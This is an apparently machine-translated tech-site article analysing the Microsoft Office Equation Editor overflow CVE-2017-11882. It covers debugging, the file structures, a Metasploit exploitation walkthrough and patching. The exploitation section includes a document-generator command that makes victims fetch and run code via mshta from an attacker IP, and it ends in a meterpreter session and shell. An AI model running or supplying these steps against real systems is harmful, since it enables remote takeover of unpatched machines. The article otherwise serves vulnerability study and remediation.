Shulou(Shulou.com)05/31 Report--

This article will explain in detail what the Office series vulnerability CVE-2017-11882 means. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

I. brief introduction of loopholes

CVE-2017-11882 is a buffer overflow type vulnerability due to a buffer overflow caused by a buffer overflow when the EQNEDT32.EXE (Microsoft office built-in formula editor) process does not check the name length when copying formula font names (Font Name data) when reading ole data containing MathType. Arbitrary code can be executed by overriding the return address of the function.

On November 14, 2017, Microsoft released a November security patch update that affected all popular Office versions.

Basic information about vulnerabilities

Vulnerability IDCVE-2017-11882 vulnerability name Microsoft Office Mathematical Formula Editor memory corruption vulnerability type remote code execution threat type stack overflow impact version Microsoft Office 2000/2003/2007sp3/2010sp2/2013sp1/2016

Second, vulnerability testing

The system environment Win7 32Microsoft Office2013 sp1 generates the test vulnerability file https://github.com/Ridter/CVE-2017-11882

Use the Command_CVE-2017-11882.py script to generate a vulnerability file.

There are two ways. Let's test the first pop-up calculator.

Third, loophole location

Because the buffer overflow function is in the EQNEDT32 process, debug and analyze it, open the vulnerability file will pop up the calculator, generally use Winexec function call, you can break the function, and then reverse push to find out the overflow point.

First, drag the eqnedt32.exe into the od to run (or append it after opening it), then locate the WinExec to break, open the vulnerability file test.doc, and the breakpoint will stop on the WinExec function.

Because the vulnerability is exploited by using a function to overwrite the return address, then we can find out the upper layer of the vulnerability function from the stack or the upper function to continue the analysis.

In the 4115A7 function up and down a good breakpoint, re-open the vulnerability file, cut off after the step (F8) analysis, after the first call did not return, but directly popped up the calculator, which shows that the vulnerability overflow point in this call, that is, the stack return address 4115D8 is overwritten, thus turning to shellcode execution.

The figure above shows the call 41160F, the original return address saved in the stack

In the case of copy font names, the buffer overflows because the length of the name is not checked, so that too long data overwrites the function's return address 4115D8.

IDA analysis shows that [ebp+28] is the overflow buffer.

[ebp+28] the space allocated is 0x24, beyond which an overflow occurs, overwriting the return address.

After the overflow point, the original return address 4115D8 is overwritten to 402114.

The overlaid address here is 402114recoveryRetn, then turn back to that address for execution.

After the Retn is executed, it will go to the 12F350, where the FONT [name] data, that is, shellcode, will be stored.

The callWinExec function in Shellcode pops up calc.exe.

The calculator was successfully ejected.

IV. Data structure analysis

The vulnerability lies in the module EQNEDT32.EXE, which embeds formulas in Office documents with OLE technology (Object Linking and Embedding, object linking and embedding). When inserting and editing mathematical formulas, EQNEDT32.EXE is not created as a child of an Office process (such as Word, etc.), but exists as a separate process. This means that the protection mechanism for Office processes such as word and excel cannot prevent the EQNEDT32.EXE process from being utilized. The vulnerability lies in the EQNEDT32.EXE processing of byte streams marked as font name records in the Office OLE Equation object. If there is an ultra-long byte stream marked as the font name in the Equation object, the program will overflow the stack due to determining the length of the string in the process of processing the string.

Equation Native data flow = EQNOLEFILEHDR + MTEFData, where

MTEFData = MTEFheader + MTEF Byte Stream

The EQNOLEFILEHDR header structure (28 bytes in total) is as follows

Struct EQNOLEFILEHDR {

WORD cbHdr; / / format header length, fixed as 0x1C.

DWORD version; / / is fixed as 0x00020000.

WORD cf; / / the clipboard format of the formula object.

The length of DWORD cbObject; / / MTEF data, excluding headers.

DWORD reserved1; / / undisclosed

DWORD reserved2; / / undisclosed

DWORD reserved3; / / undisclosed

DWORD reserved4; / / undisclosed

}

The corresponding data are shown below.

MTEFheader

Bytedescriptionvalue0MTEF version31generating platform0 for Macintosh, 1 for Windows2generating product0 for MathType, 1 for Equation Editor3product version34product subversion0

MTEFByte Stream

Valuesymboldescription0ENDend of MTEF, pile, line, embellishment list, or template1LINEline (slot) record2CHARcharacter record3TMPLtemplate record4PILEpile (vertical stack of lines) record5MATRIXmatrix record6EMBELLcharacter embellishment (e.g. Hat, prime) record7RULERruler (tab-stop location) record8FONTfont name record9SIZEgeneral size record10FULLfull size record11SUBsubscript size record12SUB2sub-subscript size record13SYMsymbol size record14SUBSYMsub-symbol size record

Reference: http://rtf2latex2e.sourceforge.net/MTEF3.html

The corresponding data type of data 8 is FONT, and the record and structure are as follows:

Struct stuFontRecord {

Tag bit 0x08 of BYTE bTag; / / font file

BYTE bTypeFace; / / font style

BYTE bStyle; / / font style

BYTE bFontName [n] / / font name with NULL as the Terminator

}

The field value describes Tag0 × 081 bytes, fixed as 0 × 08tfacetypeface number1 bytes, Typeface number style1 or 21 bytes, 1 for italics, 2 for bold nameFont name (null-terminated) font name, ending with Null

The corresponding data are shown below.

V. Analysis of RTF structure

Among them, the\ objupdate control word ensures that the OLE object is automatically updated and loaded, thus triggering the execution of the vulnerability code. By default, OLE Object in an Office document requires the user to double-click to take effect. Set the properties of the OLE Object to update automatically, so that no interaction is required, and the OLE Object object takes effect when you click to open the document, thus executing malicious code.

Analysis of vulnerability file ole object

You can see that the mathematical formula ole object has been inserted

View the directory structure of the ole object

You can see that the ole object contains the EquationNative stream

Use the olebrowse tool to view Equation Native streams

VI. MSF utilization

Environmental preparation

The target machine Win7 and the office attack machine Kali linuxMsf component https://github.com/0x09AL/CVE-2017-11882-metasploit with this vulnerability

First download the component

Bring cve_2017_11882.rbcopy to

/ usr/share/Metasploit-framework/modules/exploits/windows/smb

Then Copycve-2017-11882.rtf to / usr/share/metasploit-framework/data/exploits

Start metasploit

Use the search command to find the 11882 corresponding module and use the command use exploit/windows/smb/cve_2017_11882

Showoptions to view the parameters to be set

Set a rebound meterpreter attack payload

Set native ip and URI path

Using the command exploit-j to return the result shows which port of the target host has established a connection

Generate the vulnerability document for the target machine, with the following command

PythonCommand109b_CVE-2017-11882.py-c "mshta http://192.168.106.132:8080/test"-o test.doc

Here is the ip of the attack machine, port setting 8080 and URI setting test. After generation, open the document on the target machine.

If successful, meterpreter will display the returned connection information. If it fails, it may be a parameter error or other error.

After success, use the command sessions-l to view the pc you control

Use the command sessions-i 1 to switch in, enter shell, and enter cmd,whoami,OVER.

VII. Fix loopholes

(1) download the https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 update patch to fix it.

(2) enable the Windows Update function to update the system automatically on a regular basis

Cancel the registration of the module

(1) Press the Win+R key combination to open cmd.exe

(2) enter the following two commands:

Reg add "HKLM\ SOFTWARE\ Microsoft\ Office\ Common\ COMCompatibility {0002CE02-0000-0000-C000-00000046}" / v "Compatibility Flags" / t REG_DWORD / d 0x400

Reg add "HKLM\ SOFTWARE\ Wow6432Node\ Microsoft\ Office\ Common\ COMCompatibility {0002CE02-000000-0000-C000-0000000046}" / v "Compatibility Flags" / t REG_DWORD / d 0x400

On the Office series of vulnerabilities CVE-2017-11882 what means to share here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.